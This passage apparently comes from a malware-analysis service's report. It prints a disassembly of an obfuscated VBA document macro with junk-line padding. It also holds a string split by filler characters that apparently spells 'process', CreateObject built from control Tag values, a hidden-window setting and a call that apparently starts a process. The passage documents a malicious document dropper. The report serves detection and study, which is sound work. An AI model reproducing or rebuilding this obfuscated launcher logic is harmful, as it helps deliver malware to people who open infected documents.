' 	LitStr 0x0045 "r}&*$**(){}&*$**(){o}&*$**(){ce}&*$**(){s}&*$**(){}&*$**(){s}&*$**(){"
' 	Add 
' 	St Rekiwrjid 
' Line #11:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #12:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #13:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #14:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #15:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #16:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #17:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #18:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #19:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #20:
' 	Ld Rekiwrjid 
' 	ArgsLd Wowzyiwozxtui 0x0001 
' 	St Cqwhcdhk 
' Line #21:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #22:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #23:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #24:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #25:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #26:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #27:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #28:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #29:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #30:
' 	SetStmt 
' 	Ld Cqwhcdhk 
' 	ArgsLd Xgydvghzai 0x0001 
' 	Set Qligjvfscbzki 
' Line #31:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #32:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #33:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #34:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #35:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #36:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #37:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #38:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #39:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #40:
' 	Ld Nsskgikvi 
' 	MemLd Wauqbcjk 
' 	MemLd Tag 
' 	St CreateObject 
' Line #41:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #42:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #43:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #44:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #45:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #46:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #47:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #48:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #49:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #50:
' 	Ld Cqwhcdhk 
' 	Ld Nsskgikvi 
' 	MemLd ChrW 
' 	LitDI2 0x000F 
' 	Add 
' 	ArgsLd Geslfkmwji 0x0001 
' 	Add 
' 	Ld Nsskgikvi 
' 	MemLd Hjezbxrfuds 
' 	MemLd Tag 
' 	Add 
' 	Ld CreateObject 
' 	Add 
' 	St Hgtoflbuiz 
' Line #51:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #52:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #53:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #54:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #55:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #56:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #57:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #58:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #59:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #60:
' 	Ld Hgtoflbuiz 
' 	Ld Nsskgikvi 
' 	MemLd Zoom 
' 	Add 
' 	St Xgmlfqfrmwg 
' Line #61:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #62:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #63:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #64:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #65:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #66:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #67:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #68:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #69:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #70:
' 	SetStmt 
' 	Ld Xgmlfqfrmwg 
' 	ArgsLd Vjkeovxo 0x0001 
' 	Set Xzppuosw 
' Line #71:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #72:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #73:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #74:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #75:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #76:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #77:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #78:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #79:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #80:
' 	LineCont 0x0004 03 00 00 00
' 	Ld Create 
' 	Ld khknasas 
' 	Add 
' 	Ld Wprzyvwtyfna 
' 	Add 
' 	Ld nbswe 
' 	Ld Xzppuosw 
' 	Ld Qligjvfscbzki 
' 	ArgsMemCall (Call) Ndmuzmgqwfnem 0x0003 
' Line #81:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #82:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #83:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #84:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #85:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #86:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #87:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #88:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #89:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #90:
' 	EndFunc 
' Line #91:
' 	FuncDefn (Function Vjkeovxo(Bewvqapoy))
' Line #92:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #93:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #94:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #95:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #96:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #97:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #98:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #99:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #100:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #101:
' 	SetStmt 
' 	Ld Bewvqapoy 
' 	ArgsLd Xgydvghzai 0x0001 
' 	Set Vjkeovxo 
' Line #102:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #103:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #104:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #105:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #106:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #107:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #108:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #109:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #110:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #111:
' 	LineCont 0x0004 02 00 00 00
' 	Ld showwindow 
' 	Ld Winlmvrthamff 
' 	Add 
' 	Ld Vjkeovxo 
' 	MemSt Omwtgwbwskjly 
' Line #112:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #113:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #114:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #115:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #116:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #117:
' 	LitStr 0x000A "zSzItGhKYQ"
' 	St wqPQZAJhhx 
' Line #118:
' 	LitDI4 0xB7F4 0x0001 
' 	St EZTGslBbfq 
' Line #119:
' 	Ld wqPQZAJhhx 
' 	Ld EZTGslBbfq 
' 	Coerce (Str) 
' 	Concat 
' 	St wqPQZAJhhx 
' Line #120:
' 	Ld wqPQZAJhhx 
' 	St sPkiPWgEFY 
' Line #121:
' 	EndFunc 
' Line #122:
' 	FuncDefn (Function Wowzyiwozxtui(Fckgjrocvl))
' Line #123:
' 	LitStr 0x0015 "    fpCzbOrrBK       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Document_open 
' Line #124:
' 	LitStr 0x0015 "    kSTokTqrAE       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St Trim 
' Line #125:
' 	LitStr 0x0015 "    vcNMCvZAtj       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St eYCgTHbUrq 
' Line #126:
' 	LitStr 0x0015 "    GeEhhzvoze       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St AepzxwaawS 
' Line #127:
' 	LitStr 0x0015 "    wjOhwARgBL       "
' 	ArgsLd HgKlHeRxyx$ 0x0001 
' 	St hRoTwUiEiW 
' Line #128:
' 	LitStr 0x000A "zSzItGhKYQ"
…

Open this report in the interactive analyzer, or submit your own file for analysis.